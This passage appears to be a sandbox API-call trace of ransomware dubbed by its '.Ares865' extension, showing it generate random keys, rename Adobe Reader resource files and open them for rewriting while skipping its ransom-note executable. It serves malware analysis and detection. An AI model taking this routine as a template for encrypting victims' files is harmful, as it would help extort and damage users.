phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0156.403] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0156.403] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0156.422] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0156.422] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0156.422] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0156.426] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="ctl32.clx" | out: lpString1="ctl32.clx") returned="ctl32.clx" [0156.426] lstrlenW (lpString="ctl32.clx") returned 9 [0156.427] lstrlenW (lpString="Ares865") returned 7 [0156.427] lstrcmpiW (lpString1="l32.clx", lpString2="Ares865") returned 1 [0156.427] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\ctl32.clx.Ares865") returned 105 [0156.427] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\ctl32.clx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\ctl32.clx"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\ctl32.clx.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\ctl32.clx.ares865"), dwFlags=0x1) returned 1 [0156.430] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\ctl32.clx.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\ctl32.clx.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0156.430] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=32767) returned 1 [0156.431] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0156.431] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0156.431] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0156.436] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0156.437] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0156.437] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0156.438] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="cze.fca" | out: lpString1="cze.fca") returned="cze.fca" [0156.438] lstrlenW (lpString="cze.fca") returned 7 [0156.438] lstrlenW (lpString="Ares865") returned 7 [0156.438] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\cze.fca.Ares865") returned 103 [0156.438] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\cze.fca" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\cze.fca"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\cze.fca.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\cze.fca.ares865"), dwFlags=0x1) returned 1 [0156.441] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\cze.fca.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\cze.fca.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0156.441] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=736) returned 1 [0156.441] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0156.442] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0156.442] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0156.444] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0156.445] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0156.445] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0156.445] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="cze.hyp" | out: lpString1="cze.hyp") returned="cze.hyp" [0156.445] lstrlenW (lpString="cze.hyp") returned 7 [0156.445] lstrlenW (lpString="Ares865") returned 7 [0156.446] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\cze.hyp.Ares865") returned 103 [0156.446] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\cze.hyp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\cze.hyp"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\cze.hyp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\cze.hyp.ares865"), dwFlags=0x1) returned 1 [0156.447] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\cze.hyp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\cze.hyp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0156.447] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=57344) returned 1 [0156.448] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0156.448] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0156.448] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0156.454] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0156.454] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0156.454] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0156.456] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="cze108.hsp" | out: lpString1="cze108.hsp") returned="cze108.hsp" [0156.456] lstrlenW (lpString="cze108.hsp") returned 10 [0156.456] lstrlenW (lpString="Ares865") returned 7 [0156.456] lstrcmpiW (lpString1="108.hsp", lpString2="Ares865") returned -1 [0156.456] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\cze108.hsp.Ares865") returned 106 [0156.456] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\cze108.hsp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\cze108.hsp"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\cze108.hsp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\cze108.hsp.ares865"), dwFlags=0x1) returned 1 [0156.458] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\cze108.hsp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\cze108.hsp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0156.458] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1208836) returned 1 [0156.459] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0156.459] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0156.459] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0156.537] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0156.537] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0156.537] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0156.554] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="cze32.clx" | out: lpString1="cze32.clx") returned="cze32.clx" [0156.554] lstrlenW (lpString="cze32.clx") returned 9 [0156.554] lstrlenW (lpString="Ares865") returned 7 [0156.554] lstrcmpiW (lpString1="e32.clx", lpString2="Ares865") returned 1 [0156.554] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\cze32.clx.Ares865") returned 105 [0156.554] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\cze32.clx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\cze32.clx"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\cze32.clx.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\cze32.clx.ares865"), dwFlags=0x1) returned 1 [0156.557] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\cze32.clx.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\cze32.clx.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0156.558] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=32721) returned 1 [0156.558] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0156.559] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0156.559] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0156.564] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0156.565] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0156.565] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0156.566] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="dan.hyp" | out: lpString1="dan.hyp") returned="dan.hyp" [0156.566] lstrlenW (lpString="dan.hyp") returned 7 [0156.566] lstrlenW (lpString="Ares865") returned 7 [0156.567] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\dan.hyp.Ares865") returned 103 [0156.567] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\dan.hyp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\dan.hyp"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\dan.hyp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\dan.hyp.ares865"), dwFlags=0x1) returned 1 [0156.569] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\dan.hyp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\dan.hyp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0156.569] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=31744) returned 1 [0156.569] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0156.570] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0156.570] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0156.574] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0156.574] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0156.574] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0156.575] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="dan32.clx" | out: lpString1="dan32.clx") returned="dan32.clx" [0156.575] lstrlenW (lpString="dan32.clx") returned 9 [0156.575] lstrlenW (lpString="Ares865") returned 7 [0156.575] lstrcmpiW (lpString1="n32.clx", lpString2="Ares865") returned 1 [0156.576] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\dan32.clx.Ares865") returned 105 [0156.576] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\dan32.clx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\dan32.clx"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\dan32.clx.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\dan32.clx.ares865"), dwFlags=0x1) returned 1 [0156.578] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\dan32.clx.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\dan32.clx.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0156.578] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=32684) returned 1 [0156.578] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0156.579] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0156.579] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0156.590] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0156.590] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0156.590] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0156.591] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="dan45.lex" | out: lpString1="dan45.lex") returned="dan45.lex" [0156.591] lstrlenW (lpString="dan45.lex") returned 9 [0156.591] lstrlenW (lpString="Ares865") returned 7 [0156.592] lstrcmpiW (lpString1="n45.lex", lpString2="Ares865") returned 1 [0156.592] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\dan45.lex.Ares865") returned 105 [0156.592] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\dan45.lex" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\dan45.lex"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\dan45.lex.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\dan45.lex.ares865"), dwFlags=0x1) returned 1 [0156.594] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\dan45.lex.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\dan45.lex.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0156.594] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=478208) returned 1 [0156.595] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0156.595] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0156.595] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0156.615] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0156.616] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0156.616] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0156.623] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="dan94.ths" | out: lpString1="dan94.ths") returned="dan94.ths" [0156.623] lstrlenW (lpString="dan94.ths") returned 9 [0156.623] lstrlenW (lpString="Ares865") returned 7 [0156.623] lstrcmpiW (lpString1="n94.ths", lpString2="Ares865") returned 1 [0156.623] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\dan94.ths.Ares865") returned 105 [0156.623] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\dan94.ths" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\dan94.ths"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\dan94.ths.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\dan94.ths.ares865"), dwFlags=0x1) returned 1 [0156.625] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\dan94.ths.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\dan94.ths.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0156.626] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=370688) returned 1 [0156.626] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0156.627] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0156.627] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0156.645] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0156.646] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0156.646] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0156.651] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="danphon.env.Ares865" | out: lpString1="danphon.env.Ares865") returned="danphon.env.Ares865" [0156.652] lstrlenW (lpString="danphon.env.Ares865") returned 19 [0156.652] lstrlenW (lpString="Ares865") returned 7 [0156.652] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0156.652] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7dc7e5a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x51c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dut.fca", cAlternateFileName="")) returned 1 [0156.652] lstrcmpiW (lpString1="dut.fca", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0156.652] lstrcmpiW (lpString1="dut.fca", lpString2="aoldtz.exe") returned 1 [0156.652] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="dut.fca" | out: lpString1="dut.fca") returned="dut.fca" [0156.652] lstrlenW (lpString="dut.fca") returned 7 [0156.652] lstrlenW (lpString="Ares865") returned 7 [0156.652] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\dut.fca.Ares865") returned 103 [0156.652] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\dut.fca" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\dut.fca"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\dut.fca.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\dut.fca.ares865"), dwFlags=0x1) returned 1 [0156.655] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\dut.fca.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\dut.fca.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0156.655] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1308) returned 1 [0156.656] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0156.656] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0156.656] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0156.659] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0156.660] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0156.660] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0156.660] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="dut.hyp" | out: lpString1="dut.hyp") returned="dut.hyp" [0156.660] lstrlenW (lpString="dut.hyp") returned 7 [0156.660] lstrlenW (lpString="Ares865") returned 7 [0156.661] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\dut.hyp.Ares865") returned 103 [0156.661] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\dut.hyp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\dut.hyp"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\dut.hyp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\dut.hyp.ares865"), dwFlags=0x1) returned 1 [0156.663] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\dut.hyp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\dut.hyp.ares865"), 